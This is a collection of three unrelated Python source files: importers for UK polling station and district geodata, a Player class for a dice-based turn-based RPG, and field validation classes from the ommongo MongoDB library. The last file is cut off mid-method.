For other file types, we must return the key
'location' from station_record_to_dict()
"""
if (
self.stations_filetype in ["shp", "shp.zip"]
and "location" not in station_record
):
if len(station.shape.points) == 1:
# we've got a point
station_record["location"] = Point(
*station.shape.points[0], srid=self.get_srid()
)
else:
# its a polygon: simplify it to a centroid and warn
self.logger.log_message(
logging.WARNING,
"Implicitly converting station geometry to point",
)
geojson = json.dumps(station.shape.__geo_interface__)
poly = self.clean_poly(GEOSGeometry(geojson))
poly.srid = self.get_srid()
station_record["location"] = poly.centroid
if self.validation_checks:
self.check_station_point(station_record)
self.add_polling_station(station_record)
def add_polling_station(self, station_info):
self.stations.add(station_info)
class BaseDistrictsImporter(BaseImporter, metaclass=abc.ABCMeta):
imports_districts = True
districts = None
districts_srid = None
@property
@abc.abstractmethod
def districts_filetype(self):
pass
@property
@abc.abstractmethod
def districts_name(self):
pass
def get_districts(self):
districts_file = os.path.join(self.base_folder_path, self.districts_name)
return self.get_data(self.districts_filetype, districts_file)
def clean_poly(self, poly):
if isinstance(poly, geos.Polygon):
poly = geos.MultiPolygon(poly, srid=self.get_srid("districts"))
return poly
return poly
def strip_z_values(self, geojson):
districts = json.loads(geojson)
districts["type"] = "Polygon"
for points in districts["coordinates"][0][0]:
if len(points) == 3:
points.pop()
districts["coordinates"] = districts["coordinates"][0]
return json.dumps(districts)
@abc.abstractmethod
def district_record_to_dict(self, record):
pass
def check_district_overlap(self, district_record):
if self.council.geography.geography.contains(district_record["area"]):
self.logger.log_message(
logging.INFO,
"District %s is fully contained by target local auth",
variable=district_record["internal_council_id"],
)
return 100
try:
intersection = self.council.geography.geography.intersection(
district_record["area"].transform(4326, clone=True)
)
district_area = district_record["area"].transform(27700, clone=True).area
intersection_area = intersection.transform(27700, clone=True).area
except GEOSException as e:
self.logger.log_message(logging.ERROR, str(e))
return
overlap_percentage = (intersection_area / district_area) * 100
if overlap_percentage > 99:
# meh - close enough
level = logging.INFO
else:
level = logging.WARNING
self.logger.log_message(
level,
"District {0} is {1:.2f}% contained by target local auth".format(
district_record["internal_council_id"], overlap_percentage
),
)
return overlap_percentage
def import_polling_districts(self):
districts = self.get_districts()
self.write_info("Districts: Found %i features in input file" % (len(districts)))
for district in districts:
if self.districts_filetype in ["shp", "shp.zip"]:
district_info = self.district_record_to_dict(district.record)
else:
district_info = self.district_record_to_dict(district)
"""
district_record_to_dict() may optionally return None
if we want to exclude a particular district record
from being imported
"""
if district_info is None:
self.logger.log_message(
logging.INFO,
"district_record_to_dict() returned None with input:\n%s",
variable=district,
pretty=True,
)
continue
if "council" not in district_info:
district_info["council"] = self.council
"""
If the file type is shp or geojson, we can usually derive
'area' automatically, but we can return it if necessary.
For other file types, we must return the key
'area' from address_record_to_dict()
"""
if self.districts_filetype in ["shp", "shp.zip"]:
geojson = json.dumps(district.shape.__geo_interface__)
if self.districts_filetype == "geojson":
geojson = json.dumps(district["geometry"])
if "area" not in district_info and (
self.districts_filetype in ["shp", "shp.zip", "geojson"]
):
poly = self.clean_poly(GEOSGeometry(geojson))
poly.srid = self.get_srid("districts")
district_info["area"] = poly
if self.validation_checks:
self.check_district_overlap(district_info)
self.add_polling_district(district_info)
def add_polling_district(self, district_info):
self.districts.add(district_info)
class BaseAddressesImporter(BaseImporter, metaclass=abc.ABCMeta):
addresses = None
@property
@abc.abstractmethod
def addresses_filetype(self):
pass
@property
@abc.abstractmethod
def addresses_name(self):
pass
def get_addresses(self):
addresses_file = os.path.join(self.base_folder_path, self.addresses_name)
return self.get_data(self.addresses_filetype, addresses_file)
@abc.abstractmethod
def address_record_to_dict(self, record):
pass
def write_context_data(self):
dwellings = Dwellings()
self.write_info("----------------------------------")
self.write_info("Contextual Data:")
self.write_info(
"Total UPRNs in AddressBase: {:,}".format(
dwellings.from_addressbase(self.council.geography.geography)
)
)
self.write_info(
"Total Dwellings from 2011 Census: {:,}".format(
dwellings.from_census(self.council.geography.gss)
)
)
self.write_info("----------------------------------")
def import_residential_addresses(self):
if self.validation_checks:
self.write_context_data()
addresses = self.get_addresses()
self.csv_row_count = len(addresses)
self.write_info(
"Addresses: Found {:,} rows in input file".format(self.csv_row_count)
)
for address in addresses:
address_info = self.address_record_to_dict(address)
if address_info is None:
self.logger.log_message(
logging.INFO,
"address_record_to_dict() returned None with input:\n%s",
variable=address,
pretty=True,
)
continue
self.add_residential_address(address_info)
element_set = set(frozenset(d.items()) for d in self.addresses.elements)
self.write_info(
"Addresses: Found {:,} unique records after converting to dicts. Removing duplicates".format(
len(element_set)
)
)
self.addresses.elements = [dict(s) for s in element_set]
self.csv_row_count = len(self.addresses.elements)
self.write_info(
"Addresses: Found {:,} distinct records in input file".format(
self.csv_row_count
)
)
self.write_info("----------------------------------") #
def add_residential_address(self, address_info):
if "council" not in address_info:
address_info["council"] = self.council
if "uprn" not in address_info:
address_info["uprn"] = ""
else:
# UPRNs less than 12 characters long may be left padded with zeros
# Making sure uprns in our addresslist are not left padded will help with matching them
# and catching duplicates.
address_info["uprn"] = str(address_info["uprn"]).lstrip("0")
self.addresses.append(address_info)
class BaseStationsDistrictsImporter(BaseStationsImporter, BaseDistrictsImporter):
def pre_import(self):
raise NotImplementedError
@property
def districts_have_station_ids(self):
"""
Check that we've called self.import_polling_{districts,stations}
Don't raise an exception though, because we might still want to
import just stations or districts for debugging - i.e. to see them
in qgis/the db. However if we don't also have the other half we
won't be able to update the UprnToCouncil table.
"""
if len(self.districts.elements) < 1:
self.logger.log_message(
logging.WARNING, "No district records added to self.districts"
)
if len(self.stations.elements) < 1:
self.logger.log_message(
logging.WARNING, "No station records added to self.stations"
)
district_ids = {
e.internal_council_id
for e in self.districts.elements
if e.internal_council_id != ""
}
station_ids_from_districts = {
e.polling_station_id
for e in self.districts.elements
if e.polling_station_id != ""
}
station_ids = {
e.internal_council_id
for e in self.stations.elements
if e.internal_council_id != ""
}
district_ids_from_stations = {
e.polling_district_id
for e in self.stations.elements
if e.polling_district_id != ""
}
def get_missing(set_a, set_b):
return set_a - set_b
if station_ids_from_districts:
self.write_info("Districts have station ids attached")
missing_ids = get_missing(station_ids_from_districts, station_ids)
for station_id in missing_ids:
self.logger.log_message(
logging.WARNING,
"Station id: %s attached to a district but not found in stations",
variable=station_id,
)
for station_id in get_missing(station_ids, station_ids_from_districts):
self.logger.log_message(
logging.WARNING,
"Station id: %s found in stations but not attached to any station",
variable=station_id,
)
return True
elif district_ids_from_stations:
self.write_info("Stations have district ids attached")
for district_id in get_missing(district_ids_from_stations, district_ids):
self.logger.log_message(
logging.WARNING,
"District id: %s attached to a station but not found in districts",
variable=district_id,
)
for district_id in get_missing(district_ids, district_ids_from_stations):
self.logger.log_message(
logging.WARNING,
"District id: %s found in districts but not attached to any station",
variable=district_id,
)
return False
def import_data(self):
# Optional step for pre import tasks
try:
self.pre_import()
except NotImplementedError:
pass
self.stations = StationSet()
self.districts = DistrictSet()
self.import_polling_districts()
self.import_polling_stations()
self.districts.save()
self.stations.save()
self.districts.update_uprn_to_council_model(self.districts_have_station_ids)
class BaseStationsAddressesImporter(BaseStationsImporter, BaseAddressesImporter):
def pre_import(self):
raise NotImplementedError
def import_data(self):
# Optional step for pre import tasks
try:
self.pre_import()
except NotImplementedError:
pass
self.stations = StationSet()
self.addresses = AddressList(self.logger)
self.import_residential_addresses()
self.import_polling_stations()
self.addresses.check_records()
self.addresses.update_uprn_to_council_model()
self.stations.save()
class BaseCsvStationsShpDistrictsImporter(
BaseStationsDistrictsImporter, CsvMixin, ShpMixin
):
"""
Stations in CSV format
Districts in SHP format
"""
stations_filetype = "csv"
districts_filetype = "shp"
class BaseShpStationsShpDistrictsImporter(BaseStationsDistrictsImporter, ShpMixin):
"""
Stations in SHP format
Districts in SHP format
"""
stations_filetype = "shp"
districts_filetype = "shp"
class BaseCsvStationsJsonDistrictsImporter(BaseStationsDistrictsImporter, CsvMixin):
"""
Stations in CSV format
Districts in GeoJSON format
"""
stations_filetype = "csv"
districts_filetype = "geojson"
class BaseCsvStationsKmlDistrictsImporter(BaseStationsDistrictsImporter, CsvMixin):
"""
Stations in CSV format
Districts in KML format
"""
districts_srid = 4326
stations_filetype = "csv"
districts_filetype = "kml"
# this is mainly here for legacy compatibility
# mostly we should override this
def district_record_to_dict(self, record):
geojson = self.strip_z_values(record.geom.geojson)
poly = self.clean_poly(GEOSGeometry(geojson, srid=self.get_srid("districts")))
return {
"internal_council_id": record["Name"].value,
"name": record["Name"].value,
"area": poly,
}
class BaseScotlandSpatialHubImporter(
BaseShpStationsShpDistrictsImporter, metaclass=abc.ABCMeta
):
"""
Data from the Scotland SpatialHub will be provided in a single
dataset for the whole country. All importers consuming this data
should extend BaseScotlandSpatialHubImporter.
"""
srid = 27700
districts_name = "parl.2019-12-12/Version 2/Polling-Districts/pub_poldi.shp"
stations_name = "parl.2019-12-12/Version 2/Polling-Places/pub_polpl.shp"
data_prefix = "Scotland-Dec 2019"
shp_encoding = "latin-1"
@property
@abc.abstractmethod
def council_name(self):
pass
@property
def data_path(self):
if getattr(settings, "PRIVATE_DATA_PATH", None):
path = settings.PRIVATE_DATA_PATH
else:
s3 = S3Wrapper()
s3.fetch_data(self.data_prefix)
path = s3.data_path
return os.path.abspath(path)
def get_base_folder_path(self):
if getattr(self, "local_files", True):
if self.base_folder_path is None:
path = os.path.join(self.data_path, self.data_prefix + "*")
return glob.glob(path)[0]
return self.base_folder_path
def parse_string(self, text):
return text.strip().strip("\x00")
def district_record_to_dict(self, record):
council_name = self.parse_string(record[2])
if council_name != self.council_name:
return None
code = self.parse_string(record[0])
if not code:
return None
name = self.parse_string(record[1])
if not name:
name = code
return {"internal_council_id": code, "name": name, "polling_station_id": code}
def station_record_to_dict(self, record):
council_name = self.parse_string(record[2])
if council_name != self.council_name:
return None
code = self.parse_string(record[0])
if not code:
return None
address = self.parse_string(record[3])
return {"internal_council_id": code, "postcode": "", "address": address}
class BaseCsvStationsCsvAddressesImporter(BaseStationsAddressesImporter, CsvMixin):
"""
Stations in CSV format
Addresses in CSV format
"""
stations_filetype = "csv"
addresses_filetype = "csv"
class BaseShpStationsCsvAddressesImporter(
BaseStationsAddressesImporter, CsvMixin, ShpMixin
):
"""
Stations in SHP format
Addresses in CSV format
"""
stations_filetype = "shp"
addresses_filetype = "csv"
class BaseGenericApiImporter(BaseStationsDistrictsImporter):
srid = 4326
districts_srid = 4326
districts_name = None
districts_url = None
stations_name = None
stations_url = None
local_files = False
def import_data(self):
# Optional step for pre import tasks
try:
self.pre_import()
except NotImplementedError:
pass
self.districts = DistrictSet()
self.stations = StationSet()
# deal with 'stations only' or 'districts only' data
if self.districts_url is not None:
self.import_polling_districts()
if self.stations_url is not None:
self.import_polling_stations()
self.districts.save()
self.stations.save()
self.districts.update_uprn_to_council_model(self.districts_have_station_ids)
def get_districts(self):
with tempfile.NamedTemporaryFile() as tmp:
urllib.request.urlretrieve(self.districts_url, tmp.name)
return self.get_data(self.districts_filetype, tmp.name)
def get_stations(self):
with tempfile.NamedTemporaryFile() as tmp:
urllib.request.urlretrieve(self.stations_url, tmp.name)
return self.get_data(self.stations_filetype, tmp.name)
class BaseApiKmlStationsKmlDistrictsImporter(BaseGenericApiImporter):
"""
Stations in KML format
Districts in KML format
"""
stations_filetype = "kml"
districts_filetype = "kml"
class BaseApiShpZipStationsShpZipDistrictsImporter(BaseGenericApiImporter, ShpMixin):
"""
Stations in Zipped SHP format
Districts in Zipped SHP format
"""
stations_filetype = "shp.zip"
districts_filetype = "shp.zip"
class BaseApiCsvStationsShpZipDistrictsImporter(
BaseGenericApiImporter, CsvMixin, ShpMixin
):
"""
Stations in CSV format
Districts in Zipped SHP format
"""
stations_filetype = "csv"
districts_filetype = "shp.zip"
| |
import random
from Boss import Boss
from Character import Character
from Enemy import Enemy
from Messages import Messages
class Player(Character):
Armor = 12
BaseSpeed = 12
ActionSet = "DEFAULT_ACTIONS"
BaseHealPower = 3
def __init__(self, name, extra_life_points):
super().__init__(name, extra_life_points)
self._blocking = False
self._kill_counter = 0
self._actions = {
"1": self.attack,
"2": self.block
}
def __lt__(self, entity):
if isinstance(entity, Enemy):
return False
elif isinstance(entity, Boss):
return True
else:
return self.get_name > entity.get_name
# Candidate to deprecate
@property
def is_blocking(self):
return self._blocking
# Candidate to deprecate
def block(self, battlefield=None):
if battlefield is None:
self._blocking = not self._blocking
else:
battlefield[0].remove(self)
self._blocking = not self._blocking
battlefield[0].append(self)
return battlefield
@property
def get_kill_counter(self):
return self._kill_counter
def set_kill_counter(self, kill_counter):
self._kill_counter = kill_counter
@property
def get_actions(self):
return self._actions
def roll_initiative(self):
input(Messages.ui_texts['ROLL_INITIATIVE'])
dice = random.randint(1, 20)
print(Messages.ui_texts['ROLLED'] + str(dice))
self.set_battle_speed(self.get_battle_speed + dice)
def play_turn(self, battlefield):
if self.is_blocking:
self.block()
self.display()
action = self.get_actions.get(input(Messages.ui_texts['WHAT_WILL_YOU_DO']))
while not action:
print(Messages.ui_texts['THINK_CLEARLY'])
self.display()
action = self.get_actions.get(input(Messages.ui_texts['WHAT_WILL_YOU_DO']))
else:
battlefield = action(battlefield)
return battlefield
def display(self):
print(self.get_name + '\'' + Messages.ui_texts['TURNS'])
print(Messages.ui_texts['LIFE_POINTS'].format(self.get_life_points))
for action in Messages.ui_texts[self.ActionSet]:
print(action)
# TODO Add specific messages depending on skill_name
# Check aoe method for guidance about the structure of the messages
def attack(self, battlefield, dmg=Character.BaseDmg, skill_name='BASIC_ATK', crit_augmented=False):
if isinstance(battlefield[1], Boss):
enemy = battlefield[1]
else:
enemy = Player.choose_target(battlefield[1])
battlefield[1].remove(enemy)
# Skill start message
print(Messages.ui_texts[skill_name][0].format(self.get_name))
if crit_augmented:
dice = 20
# Crit Augmented message
print(Messages.ui_texts['PLACEHOLDER'])
else:
input(Messages.ui_texts['ROLL_ATTACK'])
dice = random.randint(1, 20)
print(Messages.ui_texts['ROLLED'] + str(dice))
if dice == 20 or dice > enemy.Armor:
print(Messages.ui_texts[skill_name][1].format(self.get_name, enemy.get_name)) # normal hit
if dice == 20 or crit_augmented:
print(Messages.ui_texts[skill_name][2].format(self.get_name, enemy.get_name)) # critical hit
enemy.set_life_points(int(-1.5 * dmg))
else:
enemy.set_life_points(-1 * dmg)
if enemy.is_alive:
if isinstance(enemy, Boss):
battlefield[1] = enemy
else:
battlefield[1].append(enemy)
else:
print(Messages.ui_texts['YOU_KILLED'])
self.set_kill_counter(self.get_kill_counter + 1)
else:
if isinstance(enemy, Boss):
battlefield[1] = enemy
else:
battlefield[1].append(enemy)
print(Messages.ui_texts[skill_name][3].format(self.get_name, enemy.get_name)) # missed
return battlefield
# TODO Add specific messages depending on skill_name
def aoe(self, battlefield, dmg=Character.BaseDmg, skill_name="AOE"):
# Skill start message
print(Messages.ui_texts[skill_name][0].format(self.get_name))
input(Messages.ui_texts['ROLL_ATTACK'])
dice = random.randint(1, 20)
print(Messages.ui_texts['ROLLED'] + str(dice))
if dice == 20:
# Critical hit Message
print(Messages.ui_texts[skill_name][2].format(self.get_name))
multiplier = -1.5
elif dice >= 10:
# Normal hit message
print(Messages.ui_texts[skill_name][1].format(self.get_name))
multiplier = -1
else:
# Miss Message
print(Messages.ui_texts[skill_name][3].format(self.get_name))
return battlefield
if isinstance(battlefield[1], Boss):
battlefield[1].set_life_points(multiplier * dmg)
return battlefield
enemies_after_skill = []
for enemy in battlefield[1]:
enemy.set_life_points(multiplier * dmg)
if enemy.is_alive:
enemies_after_skill.append(enemy)
else:
self.set_kill_counter(self.get_kill_counter + 1)
battlefield[1] = enemies_after_skill
return battlefield
# TODO Review messages of apply_status flow
def apply_status(self, battlefield, turns, status, dmg=7, skill_name="STATUS", crit_augmented=False):
if isinstance(battlefield[1], Boss):
enemy = battlefield[1]
else:
enemy = Player.choose_target(battlefield[1])
battlefield[1].remove(enemy)
# Skill start message
print(Messages.ui_texts[skill_name][0].format(self.get_name))
if crit_augmented:
dice = 20
# Crit Augmented message
print(Messages.ui_texts['PLACEHOLDER'])
else:
input(Messages.ui_texts['ROLL_ATTACK'])
dice = random.randint(1, 20)
print(Messages.ui_texts['ROLLED'] + str(dice))
if status == "POISON":
if dice == 20 or crit_augmented:
enemy.poison(turns + 1, dmg + 1, self)
elif dice >= 12:
enemy.poison(turns, dmg, self)
else:
# Miss message
print(Messages.ui_texts[skill_name][1].format(self.get_name))
elif status == "FREEZE":
if dice == 20:
enemy.freeze(turns + 2)
enemy.set_life_points(-1.5 * dmg)
elif dice >= 12:
enemy.freeze(turns)
enemy.set_life_points(-1 * dmg)
else:
# Fail!
print(Messages.ui_texts[skill_name][1].format(self.get_name))
if enemy.is_alive:
if isinstance(enemy, Boss):
battlefield[1] = enemy
else:
battlefield[1].append(enemy)
else:
print(Messages.ui_texts['PLACEHOLDER'])
self.set_kill_counter(self.get_kill_counter + 1)
return battlefield
def heal(self, battlefield, skill_name="HEAL", resurrect=False, bonus_healing=0):
# Spell start message
print(Messages.ui_texts[skill_name][0].format(self.get_name))
target = Player.choose_target(battlefield[0])
input(Messages.ui_texts['ROLL_HEAL'])
dice = random.randint(1, 20)
if dice == 20:
if resurrect:
target.revive()
target.set_life_points(1.5 * (self.BaseHealPower + bonus_healing))
elif dice >= 10:
if resurrect:
target.revive()
target.set_life_points(self.BaseHealPower + bonus_healing)
return battlefield
# TODO Add healing counter here
def party_healing(self, battlefield, skill_name='PARTY_HEAL', bonus_healing=0):
# Spell start message
print(Messages.ui_texts[skill_name][0].format(self.get_name))
input(Messages.ui_texts['ROLL_HEAL'])
dice = random.randint(1, 20)
if dice == 20:
# Crit success
print(Messages.ui_texts[skill_name][1].format(self.get_name))
for friend in battlefield[0]:
friend.set_life_points(1.5 * ((self.BaseHealPower + bonus_healing) / 2))
# TODO Add healing counter here
elif dice >= 10:
# Success
print(Messages.ui_texts[skill_name][2].format(self.get_name))
for friend in battlefield[0]:
friend.set_life_points((self.BaseHealPower + bonus_healing) / 2)
# TODO Add healing counter here
else:
# Fail
print(Messages.ui_texts[skill_name][3].format(self.get_name))
return battlefield
# TODO Change 'ENEMY_HAS_LIFE_POINTS' for just 'X_HAS_LIFE_POINTS'
# TODO Modify 'X_HAS_LIFE_POINTS' to show max health too
@staticmethod
def choose_target(targets):
i = 1
for enemy in targets:
print(Messages.ui_texts["X_HAS_LIFE_POINTS"].format(i, enemy.get_name, enemy.get_life_points))
i += 1
t = 0
while True:
try:
t = int(input(Messages.ui_texts['WHATS_YOUR_TARGET']))
except ValueError:
print(Messages.ui_texts['THAT_IS_NOT_EVEN'])
t = 0
continue
if 0 < t < i:
break
print(Messages.ui_texts['THAT_IS_NOT_VALID'])
return targets[int(t) - 1]
| |
# The MIT License
#
# Copyright (c) 2010 Jeffrey Jenkins
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import print_function
from ommongo.py3compat import *
from ommongo.fields.base import *
class PrimitiveField(Field):
''' Primitive fields are fields where a single constructor can be used
for wrapping and unwrapping an object.'''
valid_modifiers = SCALAR_MODIFIERS
def __init__(self, constructor, **kwargs):
super(PrimitiveField, self).__init__(**kwargs)
self.constructor = constructor
def wrap(self, value):
self.validate_wrap(value)
return self.constructor(value)
def unwrap(self, value, session=None):
self.validate_unwrap(value)
return self.constructor(value)
class StringField(PrimitiveField):
''' Unicode Strings. ``unicode`` is used to wrap and unwrap values,
and any subclass of basestring is an acceptable input'''
def __init__(self, max_length=None, min_length=None, **kwargs):
''' :param max_length: maximum string length
:param min_length: minimum string length
:param kwargs: arguments for :class:`Field`
'''
self.max = max_length
self.min = min_length
super(StringField, self).__init__(constructor=unicode, **kwargs)
def validate_wrap(self, value):
''' Validates the type and length of ``value`` '''
if not isinstance(value, basestring):
self._fail_validation_type(value, basestring)
if self.max is not None and len(value) > self.max:
self._fail_validation(value, 'Value too long (%d)' % len(value))
if self.min is not None and len(value) < self.min:
self._fail_validation(value, 'Value too short (%d)' % len(value))
class RegExStringField(PrimitiveField):
''' Unicode Strings. ``unicode`` is used to wrap and unwrap values,
and any subclass of basestring is an acceptable input, as long as
it matches the provided regex.'''
def __init__(self, regex, **kwargs):
''' :param regex: instance of :class: `RegexObject` to match against
:param kwargs: arguments for :class:`Field`
'''
self.regex = regex
super(RegExStringField, self).__init__(constructor=unicode, **kwargs)
def validate_wrap(self, value):
''' Validates the type and length of ``value`` '''
if not isinstance(value, basestring):
self._fail_validation_type(value, basestring)
if self.regex.match(value) is None:
self._fail_validation(value, 'Value does not match regular expression')
class BinaryField(PrimitiveField):
def __init__(self, **kwargs):
super(BinaryField, self).__init__(constructor=Binary, **kwargs)
def validate_wrap(self, value):
if not isinstance(value, bytes) and not isinstance(value, Binary):
self._fail_validation_type(value, str, Binary)
class BoolField(PrimitiveField):
''' ``True`` or ``False``.'''
def __init__(self, **kwargs):
super(BoolField, self).__init__(constructor=bool, **kwargs)
def validate_wrap(self, value):
if not isinstance(value, bool):
self._fail_validation_type(value, bool)
class NumberField(PrimitiveField):
''' Base class for numeric fields '''
valid_modifiers = NUMBER_MODIFIERS
def __init__(self, constructor, min_value=None, max_value=None, **kwargs):
''' :param max_value: maximum value
:param min_value: minimum value
:param kwargs: arguments for :class:`Field`
'''
super(NumberField, self).__init__(constructor=constructor, **kwargs)
self.min = min_value
self.max = max_value
def schema_json(self):
super_schema = super(NumberField, self).schema_json()
return dict(min_value=self.min,
max_value=self.max, **super_schema)
def validate_wrap(self, value, *types):
''' Validates the type and value of ``value`` '''
for type in types:
if isinstance(value, type):
break
else:
self._fail_validation_type(value, *types)
if self.min is not None and value < self.min:
self._fail_validation(value, 'Value too small')
if self.max is not None and value > self.max:
self._fail_validation(value, 'Value too large')
class IntField(NumberField):
''' Subclass of :class:`~NumberField` for ``int``'''
def __init__(self, **kwargs):
''' :param max_value: maximum value
:param min_value: minimum value
:param kwargs: arguments for :class:`Field`
'''
super(IntField, self).__init__(constructor=int, **kwargs)
def validate_wrap(self, value):
''' Validates the type and value of ``value`` '''
NumberField.validate_wrap(self, value, int, long)
class FloatField(NumberField):
''' Subclass of :class:`~NumberField` for ``float`` '''
def __init__(self, **kwargs):
''' :param max_value: maximum value
:param min_value: minimum value
:param kwargs: arguments for :class:`Field`
'''
super(FloatField, self).__init__(constructor=float, **kwargs)
def validate_wrap(self, value):
''' Validates the type and value of ``value`` '''
return NumberField.validate_wrap(self, value, float, int)
class DateTimeField(PrimitiveField):
''' Field for datetime objects. '''
has_autoload = True
def __init__(self, min_date=None, max_date=None, use_tz=False, **kwargs):
''' :param max_date: maximum date
:param min_date: minimum date
:param use_tz: Require a timezone-aware datetime (via pytz).
Values are converted to UTC before saving. min and max dates
are currently ignored when use_tz is on. You MUST pass a
timezone into the session
:param kwargs: arguments for :class:`Field`
'''
super(DateTimeField, self).__init__(lambda dt : dt, **kwargs)
self.min = min_date
self.max = max_date
self.use_tz = use_tz
if self.use_tz:
import pytz
self.utc = pytz.utc
assert self.min is None and self.max is None
def schema_json(self):
super_schema = super(DateTimeField, self).schema_json()
return dict(min_date=self.min,
max_date=self.max,
use_tz=self.use_tz, **super_schema)
def wrap(self, value):
self.validate_wrap(value)
value = self.constructor(value)
if self.use_tz:
return value
return value
def unwrap(self, value, session=None):
self.validate_unwrap(value)
value = self.constructor(value)
if value.tzinfo is not None:
import pytz
value = value.replace(tzinfo=pytz.utc)
if session and session.timezone:
value = value.astimezone(session.timezone)
return value
def localize(self, session, value):
if value is None or not self.use_tz:
return value
return value.astimezone(session.timezone)
def validate_wrap(self, value):
''' Validates the value's type as well as it being in the valid
date range'''
if not isinstance(value, datetime):
self._fail_validation_type(value, datetime)
if self.use_tz and value.tzinfo is None:
self._fail_validation(value, '''datetime is not timezone aware and use_tz is on. make sure timezone is set on the session''')
# if using timezone support it isn't clear how min and max should work,
# so the problem is being punted on for now.
if self.use_tz:
return
# min/max
if self.min is not None and value < self.min:
self._fail_validation(value, 'DateTime too old')
if self.max is not None and value > self.max:
self._fail_validation(value, 'DateTime too new')
class TupleField(Field):
''' Represents a field which is a tuple of a fixed size with specific
types for each element in the field.
**Examples** ``TupleField(IntField(), BoolField())`` would accept
``[19, False]`` as a value for both wrapping and unwrapping. '''
# uses scalar modifiers since it is not variable length
valid_modifiers = SCALAR_MODIFIERS
def __init__(self, *item_types, **kwargs):
''' :param item_types: instances of :class:`Field`, in the order they \
will appear in the tuples.
:param kwargs: arguments for :class:`Field`
'''
super(TupleField, self).__init__(**kwargs)
self.size = len(item_types)
self.types = item_types
def schema_json(self):
super_schema = super(TupleField, self).schema_json()
types = [t.schema_json() for t in self.types]
return dict(types=types, **super_schema)
def set_parent_on_subtypes(self, parent):
for type in self.types:
type._set_parent(parent)
def validate_wrap(self, value):
''' Checks that the correct number of elements are in ``value`` and that
each element validates agains the associated Field class
'''
if not isinstance(value, list) and not isinstance(value, tuple):
self._fail_validation_type(value, tuple, list)
for field, value in izip(self.types, list(value)):
field.validate_wrap(value)
def validate_unwrap(self, value):
''' Checks that the correct number of elements are in ``value`` and that
each element validates agains the associated Field class
'''
if not isinstance(value, list) and not isinstance(value, tuple):
self._fail_validation_type(value, tuple, list)
for field, value in izip(self.types, value):
field.validate_unwrap(value)
def wrap(self, value):
''' Validate and then wrap ``value`` for insertion.
:param value: the tuple (or list) to wrap
'''
self.validate_wrap(value)
ret = []
for field, value in izip(self.types, value):
ret.append(field.wrap(value))
return ret
def unwrap(self, value, session=None):
''' Validate and then unwrap ``value`` for object creation.
:param value: list returned from the database.
'''
self.validate_unwrap(value)
ret = []
for field, value in izip(self.types, value):
ret.append(field.unwrap(value, session=session))
return tuple(ret)
class GeoField(TupleField):
def __init__(self, **kwargs):
''' :param item_types: instances of :class:`Field`, in the order they \
will appear in the tuples.
:param kwargs: arguments for :class:`Field`
'''
super(GeoField, self).__init__(FloatField(), FloatField(), **kwargs)
def schema_json(self):
super_schema = super(GeoField, self).schema_json()
return dict(**super_schema)
class EnumField(Field):
''' Represents a single value out of a list of possible values, all
of the same type. == is used for comparison
**Example**: ``EnumField(IntField(), 4, 6, 7)`` would accept anything
in ``(4, 6, 7)`` as a value. It would not accept ``5``.
'''
valid_modifiers = SCALAR_MODIFIERS
def __init__(self, item_type, *values, **kwargs):
''' :param item_type: Instance of :class:`Field` to use for validation, and (un)wrapping
:param values: Possible values. ``item_type.is_valid_wrap(value)`` should be ``True``
'''
super(EnumField, self).__init__(**kwargs)
self.item_type = item_type
self.values = values
# Jan 22, 2011: Commenting this out. We already check that the value
# is the right type, and that it is equal to one of the enum values.
# If those are true, the enum values are the right type. If we do it
# now it causes validation issues in some cases with the
# string-reference document fields
#
# for value in values:
# self.item_type.validate_wrap(value)
def schema_json(self):
super_schema = super(EnumField, self).schema_json()
return dict(item_type=self.item_type.schema_json(),
values=[self.item_type.wrap(v) for v in self.values],
**super_schema)
def set_parent_on_subtypes(self, parent):
self.item_type._set_parent(parent)
def validate_wrap(self, value):
''' Checks that value is valid for `EnumField.item_type` and that
value is one of the values specified when the EnumField was
constructed '''
self.item_type.validate_wrap(value)
if value not in self.values:
self._fail_validation(value, 'Value was not in the enum values')
def validate_unwrap(self, value):
''' Checks that value is valid for `EnumField.item_type`.
.. note ::
Since checking the value itself is not possible until is is
actually unwrapped, that check is done in :func:`EnumField.unwrap`'''
self.item_type.validate_unwrap(value)
def wrap(self, value):
''' Validate and wrap value using the wrapping function from
``EnumField.item_type``
'''
self.validate_wrap(value)
return self.item_type.wrap(value)
def unwrap(self, value, session=None):
''' Unwrap value using the unwrap function from ``EnumField.item_type``.
Since unwrap validation could not happen in is_valid_wrap, it
happens in this function.'''
self.validate_unwrap(value)
value = self.item_type.unwrap(value, session=session)
for val in self.values:
if val == value:
return val
self._fail_validation(value, 'Value was not in the enum values')
class AnythingField(Field):
''' A field that passes through whatever is set with no validation. Useful
for free-form objects '''
valid_modifiers = ANY_MODIFIER
def schema_json(self):
return super(AnythingField, self).schema_json()
def wrap(self, value):
''' Always returns the value passed in'''
return value
def unwrap(self, value, session=None):
''' Always returns the value passed in'''
return value
def validate_unwrap(self, value):
''' Always passes'''
pass
def validate_wrap(self, value):
''' Always passes'''
pass
class ObjectIdField(Field):
''' pymongo Object ID object. Currently this is probably too strict. A
string version of an ObjectId should also be acceptable'''
valid_modifiers = SCALAR_MODIFIERS
def __init__(self, session=None, auto=False, **kwargs):
if auto:
kwargs['default_f'] = lambda : ObjectId()
super(ObjectIdField, self).__init__(**kwargs)
def schema_json(self):
super_schema = super(ObjectIdField, self).schema_json()
return dict(auth=self.auto, **super_schema)
# def set_default(self, value):
# super(ObjectIdField, self).set_default(value)
# def get_default(self):
# if self.auto:
# self.set_default(ObjectId())
# return super(ObjectIdField, self).get_default()
# default = property(get_default, set_default)
def gen(self):
""" Helper method to create a new ObjectId """
return ObjectId()
def validate_wrap(self, value):
